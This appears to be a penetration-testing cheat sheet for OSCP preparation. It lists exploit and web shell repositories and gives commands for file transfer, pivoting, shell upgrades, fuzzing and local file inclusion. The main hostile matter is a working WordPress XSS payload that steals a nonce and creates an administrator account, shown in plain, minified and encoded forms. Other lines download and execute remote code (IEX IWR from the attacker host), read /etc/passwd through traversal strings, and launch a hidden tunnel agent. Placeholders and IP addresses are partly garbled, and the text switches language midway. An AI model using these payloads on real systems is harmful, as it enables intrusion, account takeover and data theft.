| n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 |
| n/a | bin-sploits | https://gitlab.com/exploit-database/exploitdb-bin-sploits |
| n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub |
| n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits |
| n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits |

### Payloads

| Name | URL |
| --- | --- |
| Payload Box | https://github.com/payloadbox |
| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |
| PHPGGC | https://github.com/ambionics/phpggc |
| PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell |
| webshell | https://github.com/tennc/webshell |
| Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |

### Wordlists

| Name | URL |
| --- | --- |
| bopscrk | https://github.com/R3nt0n/bopscrk |
| CeWL | https://github.com/digininja/cewl |
| COOK | https://github.com/giteshnxtlvl/cook |
| CUPP | https://github.com/Mebus/cupp |
| Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists |
| SecLists | https://github.com/danielmiessler/SecLists |
| Username Anarchy | https://github.com/urbanadventurer/username-anarchy |

### Reporting

| Name | URL |
| --- | --- |
| OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault |
| SysReptor | https://github.com/Syslifters/sysreptor |
| SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting |
| SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ |

### Social Media Resources

| Name | URL |
| --- | --- |
| OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x |
| Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |
| HackTricks | https://book.hacktricks.xyz/ |
| HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation |
| Hacking Articles | https://www.hackingarticles.in/ |
| Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ |
| OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP |
| OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 |
| IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |
| IppSec.rocks | https://ippsec.rocks/?# |
| 0xdf | https://0xdf.gitlab.io/ |

## Commands

### Basics

#### curl

Placeholders in angle brackets (`<RHOST>`, `<LHOST>`, `<FILE>`, ...) stand for values you substitute; they were stripped from the extracted page and are restored here.

```
curl -v http://<RHOST>                                           // verbose output
curl -X POST http://<RHOST>                                      // use POST method
curl -X PUT http://<RHOST>                                       // use PUT method
curl --path-as-is http://<RHOST>/../../../../../../etc/passwd    // use --path-as-is to handle /../ or /./ in the given URL
curl --proxy http://127.0.0.1:8080                               // use proxy
curl -F myFile=@<FILE> http://<RHOST>                            // file upload
curl${IFS}<RHOST>/                                               // Internal Field Separator (IFS) example
```

#### File Transfer

##### Certutil

```
certutil -urlcache -split -f "http://<LHOST>/<FILE>"
```

##### Netcat

```
nc -lnvp <LPORT> > <FILE>
nc <LHOST> <LPORT> < <FILE>
```

##### Impacket

```
sudo impacket-smbserver <SHARE> ./
sudo impacket-smbserver <SHARE> . -smb2support
copy * \\<LHOST>\<SHARE>
```

##### PowerShell

```
iwr <LHOST>/<FILE> -o <FILE>
IEX(IWR http://<LHOST>/<FILE>) -UseBasicParsing
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE>
```

##### Bash only

###### wget Version

Paste it directly into the shell.

```
function __wget() {
    : ${DEBUG:=0}
    local URL=$1
    local tag="Connection: close"
    local mark=0

    if [ -z "${URL}" ]; then
        printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
               "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1;
    fi
    # split the URL into protocol, host[:port] and path
    read proto server path <<<$(echo ${URL//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    # open a raw TCP connection on fd 3 via bash's /dev/tcp pseudo-device
    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    # the body is printed only after the "Connection: close" header line has
    # been seen, so this relies on the server echoing that header back
    while read line; do
        [[ $mark -eq 1 ]] && echo $line
        if [[ "${line}" =~ "${tag}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}
```

```
__wget http://<RHOST>/<FILE>
```

###### curl Version

```
function __curl() {
    # split the URL into protocol, host[:port] and path
    read proto server path <<<$(echo ${1//// })
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

    # open a raw TCP connection on fd 3 and send a plain HTTP/1.0 request
    exec 3<>/dev/tcp/${HOST}/$PORT
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    # skip the header block up to the empty (CR-only) line, then dump the body
    (while read line; do
        [[ "$line" == $'\r' ]] && break
    done && cat) <&3
    exec 3>&-
}
```

```
__curl http://<RHOST>/<FILE> > <OUTPUT_FILE>
```

#### FTP

```
ftp <RHOST>
ftp -A <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>
```

#### Kerberos

```
sudo apt-get install krb5-kdc
```

##### Ticket Handling

```
impacket-getTGT <DOMAIN>/<USERNAME>:'<PASSWORD>'
export KRB5CCNAME=<USERNAME>.ccache
export KRB5CCNAME=$(realpath <USERNAME>.ccache)
KRB5CCNAME=<USERNAME>.ccache
```

##### Kerberos Related Files

```
/etc/krb5.conf                                          // kerberos configuration file location
kinit                                                   // creating ticket request
klist                                                   // show available kerberos tickets
kdestroy                                                // delete cached kerberos tickets
.k5login                                                // resides kerberos principals for login (place in home directory)
krb5.keytab                                             // "key table" file for one or more principals
kadmin                                                  // kerberos administration console
add_principal                                           // add a new user to a keytab file
ksu                                                     // executes a command with kerberos authentication
klist -k /etc/krb5.keytab                               // lists keytab file
kadmin -p kadmin/<HOSTNAME> -k -t /etc/krb5.keytab      // enables editing of the keytab file
```

##### Ticket Conversion

###### kirbi to ccache

```
base64 -d <TICKET>.kirbi.b64 > <TICKET>.kirbi
impacket-ticketConverter <TICKET>.kirbi <TICKET>.ccache
export KRB5CCNAME=$(realpath <TICKET>.ccache)
```

###### ccache to kirbi

```
impacket-ticketConverter <TICKET>.ccache <TICKET>.kirbi
base64 -w0 <TICKET>.kirbi > <TICKET>.kirbi.base64
```

#### Ligolo-ng

##### Download Proxy and Agent

##### Prepare Tunnel Interface

```
sudo ip tuntap add user $(whoami) mode tun ligolo
```

```
sudo ip link set ligolo up
```

##### Setup Proxy on Attacker Machine

```
./proxy -laddr <LHOST>:443 -selfcert
```

##### Setup Agent on Target Machine

```
./agent -connect <LHOST>:443 -ignore-cert
```

##### Configure Session

```
ligolo-ng » session
```

```
[Agent : user@target] » ifconfig
```

```
sudo ip r add 172.16.1.0/24 dev ligolo
```

or

```
sudo ip route add 240.0.0.1/32 dev ligolo
```

```
[Agent : user@target] » start
```

##### Port Forwarding

```
[Agent : user@target] » listener_add --addr <RHOST>:<RPORT> --to <LHOST>:<LPORT> --tcp
```

##### Alternative Session Configuration

###### Setup Proxy on Attacker Machine

```
sudo ./proxy -selfcert
```

###### Prepare Tunnel Interface

```
ligolo-ng » ifcreate --name ligolo
```

###### Add Route to Tunnel Interface

```
ligolo-ng » route_add --name ligolo --route <NETWORK>/<CIDR>
```

##### Setup Agent on Target Machine

```
Start-Process -FilePath ".\agent.exe" -ArgumentList "-connect <LHOST>:11601 -ignore-cert" -WindowStyle Hidden
```

#### Linux

##### CentOS

```
doas -u <USERNAME> /bin/sh
```

##### Environment Variables

```
export PATH=$(pwd):$PATH
```

##### gcc

```
gcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc -o main32.exe main.c
x86_64-w64-mingw32-gcc -o main64.exe main.c
```

##### getfacl

```
getfacl <FILE>
```

##### iconv

```
echo "<COMMAND>" | iconv -t UTF-16LE | base64 -w 0
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
iconv -f ASCII -t UTF-16LE <FILE>.txt | base64 | tr -d "\n"
```

##### vi

```
:w !sudo tee %    # save file with elevated privileges without exiting
```

##### Windows Command Formatting

```
echo "<COMMAND>" | iconv -f UTF-8 -t UTF-16LE | base64 -w0
```

#### Microsoft Windows

##### dir

```
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log
```

#### NFS

```
sudo mount -t nfs -o vers=4,nolock <RHOST>:/<SHARE> /PATH/TO/FOLDER/
```

#### PHP Webserver

```
sudo php -S 127.0.0.1:80
```

#### Ping

```
ping -c 1 <RHOST>
ping -n 1 <RHOST>
```

#### Port Forwarding

##### Chisel

| System | IP Address |
| ------------------ | -------------- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

###### Reverse Pivot

- LHOST < APPLICATION SERVER

###### LHOST

```
./chisel server -p 9002 -reverse -v
```

###### APPLICATION SERVER

```
./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000
```

###### SOCKS5 / Proxychains Configuration

- LHOST > APPLICATION SERVER > NETWORK

###### LHOST

```
./chisel server -p 9002 -reverse -v
```

###### APPLICATION SERVER

```
./chisel client 192.168.50.10:9002 R:socks
```

##### Ligolo-ng

| System | IP Address |
| ------------------ | -------------- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > NETWORK

###### Download Proxy and Agent

```
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz
```

###### Prepare Tunnel Interface

```
sudo ip tuntap add user $(whoami) mode tun ligolo
```

```
sudo ip link set ligolo up
```

###### Setup Proxy on LHOST

```
./proxy -laddr 192.168.50.10:443 -selfcert
```

###### Setup Agent on APPLICATION SERVER

```
./agent -connect 192.168.50.10:443 -ignore-cert
```

###### Configure Session

```
ligolo-ng » session
```

```
[Agent : user@target] » ifconfig
```

```
sudo ip r add 172.16.50.0/24 dev ligolo
```

```
[Agent : user@target] » start
```

###### Port Forwarding

- LHOST < APPLICATION SERVER > DATABASE SERVER

```
[Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp
```

##### Socat

| System | IP Address |
| ------------------ | -------------- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > DATABASE SERVER

###### APPLICATION SERVER

```
ip a
ip r
socat -ddd TCP-LISTEN:2345,fork TCP:10.10.100.20:5432
```

###### LHOST

```
psql -h 192.168.100.10 -p 2345 -U postgres
```

##### SSH Tunneling

###### Local Port Forwarding

| System | IP Address |
| --- | --- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### APPLICATION SERVER

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh <USERNAME>@192.168.100.10
ip a
ip r
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20
```

###### LHOST

```
smbclient -p 4455 //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>
```

###### Dynamic Port Forwarding

| System | IP Address |
| --- | --- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

- LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### APPLICATION SERVER

```
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20
```

###### LHOST

```
sudo ss -tulpn
tail /etc/proxychains4.conf
socks5 192.168.50.10 9999
proxychains smbclient -p 4455 //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>
```

###### Remote Port Forwarding

| System | IP Address |
| --- | --- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 10.10.100.20 |
| WINDOWS HOST | 172.16.50.10 |

- LHOST <-> FIREWALL <-> APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST

###### LHOST

```
sudo systemctl start ssh
sudo ss -tulpn
```

###### APPLICATION SERVER

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10
```

###### LHOST

```
psql -h 127.0.0.1 -p 2345 -U postgres
```

###### Remote Dynamic Port Forwarding

| System | IP Address |
| ------------------ | -------------- |
| LHOST | 192.168.50.10 |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER | 
10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ``` python3 -c 'import pty; pty.spawn("/bin/bash")' ssh -N -R 9998 @192.168.50.10 ``` ###### LHOST ``` sudo ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20 ``` ##### sshuttle | 系统 | IP 地址 | | ------------------ | -------------- | | LHOST | 192168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST > APPLICATION SERVER > NETWORK ###### APPLICATION SERVER ``` socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22 ``` ###### LHOST ``` sshuttle -r @192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24 smbclient -L //172.16.50.10/ -U --password= ``` ##### ssh.exe | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > NETWORK ###### LHOST ``` sudo systemctl start ssh xfreerdp3 /u: /p: /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ``` where ssh C:\Windows\System32\OpenSSH\ssh.exe C:\Windows\System32\OpenSSH> ssh -N -R 9998 @192.168.50.10 ``` ###### LHOST ``` ss -tulpn tail /etc/proxychains4.conf socks5 127.0.0.1 9998 proxychains psql -h 10.10.100.20 -U postgres ``` ##### Plink | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER ###### LHOST ``` find / -name plink.exe 2>/dev/null /usr/share/windows-resources/binaries/plink.exe ``` ###### WINDOWS JUMP SERVER ``` plink.exe -ssh -l -pw -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10 ``` ###### LHOST ``` ss -tulpn xfreerdp3 /u: /p: 
/v:127.0.0.1:9833 ``` ##### Netsh | 系统 | IP 地址 | | ------------------- | -------------- | | LHOST | 192.168.50.10 | | APPLICATION SERVER | 192.168.100.10 | | WINDOWS JUMP SERVER | 192.168.100.20 | | DATABASE SERVER | 10.10.100.20 | | WINDOWS HOST | 172.16.50.10 | - LHOST < FIREWALL < WINDOWS JUMP SERVER > DATABASE SERVER ###### LHOST ``` xfreerdp3 /u: /p: /v:192.168.100.20 ``` ###### WINDOWS JUMP SERVER ``` netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20 netstat -anp TCP | findstr "2222" netsh interface portproxy show all netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow ``` ###### LHOST ``` sudo nmap -sS 192.168.50.10 -Pn -n -p2222 ssh database_admin@192.168.50.10 -p2222 ``` ###### WINDOWS JUMP SERVER ``` netsh advfirewall firewall delete rule name="port_forward_ssh_2222" netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10 ``` #### Python Webserver ``` sudo python -m SimpleHTTPServer 80 sudo python3 -m http.server 80 ``` #### RDP ``` xfreerdp3 /v: /u: /p: /cert-ignore xfreerdp3 /v: /u: /p: /d: /cert-ignore xfreerdp3 /v: /u: /p: +dynamic-resolution +clipboard xfreerdp3 /v: /u: /d: /pth:'' +dynamic-resolution +clipboard xfreerdp3 /v: +dynamic-resolution +clipboard /tls:seclevel:0 /sec:nla:off rdesktop ``` #### showmount ``` /usr/sbin/showmount -e sudo showmount -e chown root:root sid-shell; chmod +s sid-shell ``` #### SMB ``` mount.cifs /// /mnt/remote guestmount --add '//' --inspector --ro /mnt/ -v ``` #### smbclient ``` smbclient -L \\\ -N smbclient -L /// -N smbclient -L ///// -N smbclient -L //// -U % smbclient -U "" -L \\\\\\ smbclient /// smbclient /// -U smbclient ///SYSVOL -U % smbclient "\\\\\" smbclient \\\\\\ -U '' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 smbclient --no-pass /// ``` ##### 一次下载多个文件 ``` mask"" 
recurse ON prompt OFF mget * ``` #### SSH ##### 使用过时的算法 ``` ssh user@ -oKexAlgorithms=+diffie-hellman-group1-sha1 ``` ##### 错误处理 ###### 修复 SSH 私钥 ``` dos2unix id_rsa vim --clean id_rsa chmod 600 id_rsa ``` ``` dos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 600 id_rsa ``` #### 时间和日期 ##### 获取服务器时间 ``` sudo nmap -sU -p 123 --script ntp-info ``` ##### 停止 virtualbox-guest-utils 以停止同步时间 ``` sudo /etc/init.d/virtualbox-guest-utils stop ``` ##### 停止 systemd-timesyncd 以手动同步时间 ``` sudo systemctl stop systemd-timesyncd ``` ##### 禁用自动同步 ``` sudo systemctl disable --now chronyd ``` ##### 设置日期和时间的选项 ##### net time ``` sudo net time -c sudo net time set -S sudo net time \\ /set /y ``` ##### ntpdate ``` sudo ntpdate sudo ntpdate -s sudo ntpdate -b -u ``` ##### rdate ``` sudo rdate -n sudo rdate -s ``` ##### timedatectl ``` sudo timedatectl show sudo timedatectl set-ntp false sudo timedatectl set-timezone UTC sudo timedatectl list-timezones sudo timedatectl set-timezone '/' sudo timedatectl set-time 15:58:30 sudo timedatectl set-time '2015-11-20 16:14:50' sudo timedatectl set-local-rtc 1 ``` ##### 与服务器保持同步 ``` while [ 1 ]; do sudo ntpdate ;done ``` #### Tmux ``` ctrl b + w # show windows ctrl + " # split window horizontal ctrl + % # split window vertical ctrl + , # rename window ctrl + { # flip window ctrl + } # flip window ctrl + spacebar # switch pane layout ``` 复制 & 粘贴 ``` :setw -g mode-keys vi ctrl b + [ space enter ctrl b + ] ``` 搜索 ``` ctrl b + [ # enter copy ctrl + / # enter search while within copy mode for vi mode n # search next shift + n # reverse search ``` 日志记录 ``` ctrl b shift + P # start / stop ``` 保存输出 ``` ctrl b + : capture-pane -S - ctrl b + : save-buffer .txt ``` #### 升级 Shell ``` python -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl + z stty raw -echo fg Enter Enter export XTERM=xterm ``` 或者 ``` Ctrl + z stty -a stty raw -echo;fg Enter Enter stty rows 37 cols 123 export TERM=xterm-256color bash ``` 或者: ``` script 
-q /dev/null -c bash /usr/bin/script -qc /bin/bash /dev/null ``` ##### 单行命令 ``` stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` ##### 错误处理 ###### 修复楼梯效应 ``` env reset ``` 或者 ``` stty onlcr ``` #### uv ``` uv add --script ``` ##### XSS 客户端攻击 ###### 请求示例 ``` foobar! ``` ###### 获取 nonce ``` var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/user-new.php"; var nonceRegex = /ser" value="([^"]*?)"/g; ajaxRequest.open("GET", requestURL, false); ajaxRequest.send(); var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); var nonce = nonceMatch[1]; ``` ###### 更新 Payload 脚本 ``` var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator"; ajaxRequest = new XMLHttpRequest(); ajaxRequest.open("POST", requestURL, true); ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); ajaxRequest.send(params); ``` ###### 压缩 Payload 脚本 ``` var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params); ``` ##### 编码函数 ``` function encode_to_javascript(string) { var input = string var output = ''; for(pos = 0; pos < input.length; pos++) { output += input.charCodeAt(pos); if(pos != (input.length - 1)) { output += ","; } } return output; } let encoded = encode_to_javascript('var params="action=createuser&_wpnonce_create-user="+nonce+"&user_login=&email=&pass1=&pass2=&role=administrator";ajaxRequest=new XMLHttpRequest,ajaxRequest.open("POST",requestURL,!0),ajaxRequest.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),ajaxRequest.send(params);') console.log(encoded) ``` ###### 编码后的 Payload ``` 
118,97,114,32,112,97,114,97,109,115,61,34,97,99,116,105,111,110,61,99,114,101,97,116,101,117,115,101,114,38,95,119,112,110,111,110,99,101,95,99,114,101,97,116,101,45,117,115,101,114,61,34,43,110,111,110,99,101,43,34,38,117,115,101,114,95,108,111,103,105,110,61,60,85,83,69,82,78,65,77,69,62,38,101,109,97,105,108,61,60,69,77,65,73,76,62,38,112,97,115,115,49,61,60,80,65,83,83,87,79,82,68,62,38,112,97,115,115,50,61,60,80,65,83,83,87,79,82,68,62,38,114,111,108,101,61,97,100,109,105,110,105,115,116,114,97,116,111,114,34,59,97,106,97,120,82,101,113,117,101,115,116,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,44,97,106,97,120,82,101,113,117,101,115,116,46,111,112,101,110,40,34,80,79,83,84,34,44,114,101,113,117,101,115,116,85,82,76,44,33,48,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,44,97,106,97,120,82,101,113,117,101,115,116,46,115,101,110,100,40,112,97,114,97,109,115,41,59 debugger eval code:14:9 ``` ###### 执行 ``` curl -i http:// --user-agent "" --proxy 127.0.0.1:8080 ``` #### ffuf ##### 常用命令 ``` ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fs -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ --fw -mc all ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ -mc 200,204,301,302,307,401 -o results.txt ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." -u http:/// -ac ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ." 
-u http:/// -fs 185 ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt -u http:///backups/backup_2020070416FUZZ.zip ``` ##### 使用请求文件 ``` ffuf -request -w /usr/share/wordlists/dirb/common.txt ``` ##### API Fuzzing ``` ffuf -u https:///api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 ``` ##### 搜索 LFI ``` ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http:///admin../admin_staging/index.php?page=FUZZ -fs 15349 ``` ##### 使用 PHP Session ID 进行 Fuzzing ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u "http:///admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644 ``` ##### 递归 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/basic/FUZZ -recursion ``` ##### 文件扩展名 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http:///cd/ext/logs/FUZZ -e .log ``` ##### 速率限制 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 5 -p 0.1 -u http:///cd/rate/FUZZ -mc 200,429 ``` ##### 虚拟主机发现 ``` ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." -u http:// -ac ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ." 
-u http:// -fs 1495 ``` ##### 大规模文件扩展名发现 ``` ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http:///FUZZ -t 30 -c -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc 200,204,301,302,307,401,403,500 -ic -e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.dot,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.phtml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip ``` #### GitTools ``` ./gitdumper.sh http:///.git/ /PATH/TO/FOLDER ./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/ ``` #### Gobuster ``` -e // extended mode that renders the full url -k // skip ssl certificate validation -r // follow cedirects -s // status codes -b // exclude status codes -k // ignore certificates --wildcard // set wildcard option gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http:/// -x php gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http:/// -x php,txt,html,js -e -s 200 gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u https://:/ -b 200 -k --wildcard ``` ##### 常见文件扩展名 ``` txt,bak,php,html,js,asp,aspx ``` ##### 常见图片扩展名 ``` png,jpg,jpeg,gif,bmp ``` ##### POST 请求 ``` gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http:///api/ -e -s 200 ``` ##### DNS 侦察 ``` gobuster dns -d -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt gobuster dns -d -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt ``` ##### VHost 发现 ``` gobuster vhost -u -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt 
gobuster vhost -u  -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
```

##### Specify a user agent

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http:/// -a Linux
```

#### Local File Inclusion (LFI)

```
http:///.php?file=
http:///.php?file=../../../../../../../../etc/passwd
http:////php?file=../../../../../../../../../../etc/passwd
```

##### Up to PHP 5.3

A trailing null byte truncates whatever suffix (e.g. `.php`) the application appends; PHP 5.3.4 and later reject it.

```
http:////php?file=../../../../../../../../../../etc/passwd%00
```

##### Null byte

```
%00
0x00
```

##### Encoded traversal strings

```
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
```

##### php://filter wrapper

Base64-encoding the resource stops the include from executing the PHP source, so it comes back as text and can be decoded locally.

```
url=php://filter/convert.base64-encode/resource=file:////var/www//api.php
```

```
http:///index.php?page=php://filter/convert.base64-encode/resource=index
http:///index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d .php
```

##### Django, Rails, or Node.js web application header values

```
Accept: ../../../../.././../../../../etc/passwd{{
